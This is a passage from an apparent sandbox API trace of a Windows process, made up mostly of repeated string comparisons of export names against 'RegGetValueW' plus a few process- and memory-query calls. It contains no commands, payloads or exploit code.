returned -1 [0209.021] lstrcmpA (lpString1="AppXFreeMemory", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetApplicationData", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetDevelopmentMode", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetOSMinVersion", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetPackageCapabilities", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXGetPackageSid", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXLookupDisplayName", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXLookupMoniker", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXPostSuccessExtension", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXPreCreationExtension", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXReleaseAppXContext", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppXUpdatePackageCapabilities", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="ApplicationUserModelIdFromProductId", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AreAllAccessesGranted", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AreAnyAccessesGranted", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AreFileApisANSI", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AreThereVisibleLogoffScriptsInternal", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AreThereVisibleShutdownScriptsInternal", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="AttachConsole", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseDllFreeResourceId", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseDllMapResourceIdW", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcess", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseMarkFileForDelete", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseReadAppCompatDataForProcess", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BasepAdjustObjectAttributesForPrivateNamespace", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BasepCopyFileCallback", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BasepCopyFileExW", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="BasepNotifyTrackingService", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="Beep", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CLOSE_LOCAL_HANDLE_INTERNAL", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CancelIo", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CancelIoEx", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CharLowerA", lpString2="RegGetValueW") returned -1 [0209.022] lstrcmpA (lpString1="CharLowerBuffA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharLowerBuffW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharLowerW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharNextA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharNextExA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharNextW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharPrevA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharPrevExA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharPrevW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharUpperA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharUpperBuffA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharUpperBuffW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CharUpperW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckGroupPolicyEnabled", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckIfStateChangeNotificationExists", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckTokenCapability", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckTokenMembership", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ChrCmpIA", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ChrCmpIW", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ClearCommBreak", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ClearCommError", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseGlobalizationUserSettingsKey", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseHandle", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ClosePackageInfo", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseState", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseStateAtom", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseStateChangeNotification", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseStateContainer", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseStateLock", lpString2="RegGetValueW") returned -1 [0209.023] lstrcmpA (lpString1="CloseThreadpool", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CommitStateAtom", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareFileTime", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareObjectHandles", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareStringA", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareStringEx", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CompareStringW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="ConvertToAutoInheritPrivateObjectSecurity", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CopyContext", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CopyFile2", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CopyFileExW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CopyFileW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CopySid", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateActCtxW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateAppContainerToken", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateDirectoryA", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateDirectoryW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateEventA", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateEventExA", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateEventExW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateEventW", lpString2="RegGetValueW") returned -1 [0209.024] lstrcmpA (lpString1="CreateFiber", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFiberEx", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFile2", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFileA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFileMappingW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateFileW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateHardLinkA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateHardLinkW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateMutexA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateMutexExA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateMutexExW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateMutexW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreatePipe", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreatePrivateObjectSecurity", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreatePrivateObjectSecurityEx", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreatePrivateObjectSecurityWithMultipleInheritance", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateProcessW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateRemoteThread", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateRemoteThreadEx", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateRestrictedToken", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateSemaphoreExW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateSemaphoreW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateStateAtom", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateStateChangeNotification", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateStateContainer", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateStateLock", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateStateSubcontainer", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateSymbolicLinkW", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateThread", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateThreadpool", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateThreadpoolCleanupGroup", lpString2="RegGetValueW") returned -1 [0209.025] lstrcmpA (lpString1="CreateThreadpoolIo", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateThreadpoolTimer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateThreadpoolWait", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateThreadpoolWork", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateTimerQueue", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateTimerQueueTimer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateWaitableTimerExW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateWaitableTimerW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CreateWellKnownSid", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="CtrlRoutine", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeactivateActCtx", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DebugActiveProcess", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DebugActiveProcessStop", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DebugBreak", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DecodePointer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DecodeRemotePointer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DecodeSystemPointer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DefineDosDeviceW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DelayLoadFailureHookLookup", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteAce", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteBoundaryDescriptor", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteCriticalSection", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteFiber", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteFileA", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteFileW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteProcThreadAttributeList", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteStateAtomValue", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteStateContainer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteStateContainerValue", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteSynchronizationBarrier", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteTimerQueueEx", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteTimerQueueTimer", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeleteVolumeMountPointW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DestroyPrivateObjectSecurity", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DeviceIoControl", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DisablePredefinedHandleTableInternal", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DisableThreadLibraryCalls", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DisassociateCurrentThreadFromCallback", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DiscardVirtualMemory", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DisconnectNamedPipe", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DnsHostnameToComputerNameExW", lpString2="RegGetValueW") returned -1 [0209.026] lstrcmpA (lpString1="DsBindWithSpnExW", lpString2="RegGetValueW") returned -1 [0209.027] lstrcmpA (lpString1="DsCrackNamesW", lpString2="RegGetValueW") returned -1 [0209.027] lstrcmpA (lpString1="DsFreeDomainControllerInfoW", lpString2="RegGetValueW") returned -1 [0209.029] EnumProcessModules (in: hProcess=0xffffffffffffffff, lphModule=0x79b1400, cb=0x1000, lpcbNeeded=0x235f518 | out: lphModule=0x79b1400, lpcbNeeded=0x235f518) returned 1 [0209.032] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff62aec0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff62aec0000, AllocationBase=0x7ff62aec0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.032] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.032] lstrcmpiA (lpString1="wcschr", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="_get_errno", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_set_errno", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="memcpy_s", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="free", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="strchr", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="wcstombs", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="_wtoi", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_itow_s", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_wcsicmp", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="bsearch", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="wcsncpy_s", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="memset", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="ceil", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="floor", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="floorf", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="memcmp", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="sqrt", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="wcscspn", lpString2="RegGetValueW") returned 1 [0209.032] lstrcmpiA (lpString1="_wcstoui64", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_errno", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="??1type_info@@UEAA@XZ", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_onexit", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="__dllonexit", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_unlock", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_lock", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="?terminate@@YAXXZ", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_commode", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_fmode", lpString2="RegGetValueW") returned -1 [0209.032] lstrcmpiA (lpString1="_wcmdln", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="__C_specific_handler", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_initterm", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="__setusermatherr", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_cexit", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_exit", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="exit", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="__set_app_type", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="__wgetmainargs", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_snwprintf_s", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_vsnwprintf_s", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="wcsspn", lpString2="RegGetValueW") returned 1 [0209.033] lstrcmpiA (lpString1="_amsg_exit", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_XcptFilter", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="?what@exception@@UEBAPEBDXZ", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="??1exception@@UEAA@XZ", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="??0exception@@QEAA@AEBV0@@Z", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBDH@Z", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBD@Z", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="memcpy", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="__CxxFrameHandler3", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_CxxThrowException", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="realloc", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="wcsstr", lpString2="RegGetValueW") returned 1 [0209.033] lstrcmpiA (lpString1="memmove", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="malloc", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="_vsnwprintf", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="wcsrchr", lpString2="RegGetValueW") returned 1 [0209.033] lstrcmpiA (lpString1="wcscmp", lpString2="RegGetValueW") returned 1 [0209.033] lstrcmpiA (lpString1="GetModuleHandleExW", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="GetModuleFileNameA", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="GetProcAddress", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="FindResourceExW", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="LoadResource", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="LockResource", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="GetModuleHandleW", lpString2="RegGetValueW") returned -1 [0209.033] lstrcmpiA (lpString1="SizeofResource", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="GetModuleHandleA", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="LoadStringW", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="FreeLibrary", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="GetModuleFileNameW", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="LoadLibraryExA", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="FreeLibraryAndExitThread", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventEnabled", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventActivityIdControl", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventUnregister", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventSetInformation", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventWriteTransfer", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventRegister", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="EventWrite", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="OpenThreadToken", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="SetPriorityClass", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="SetProcessShutdownParameters", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="GetPriorityClass", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="OpenProcessToken", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="TerminateThread", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="FlushInstructionCache", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="ExitProcess", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="GetStartupInfoW", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="SetThreadPriority", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="OpenProcess", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="SetThreadPriorityBoost", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="GetCurrentThread", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="QueueUserAPC", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="TlsAlloc", lpString2="RegGetValueW") returned 1 [0209.034] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="RegGetValueW") returned -1 [0209.034] lstrcmpiA (lpString1="GetThreadPriority", lpString2="RegGetValueW") returned 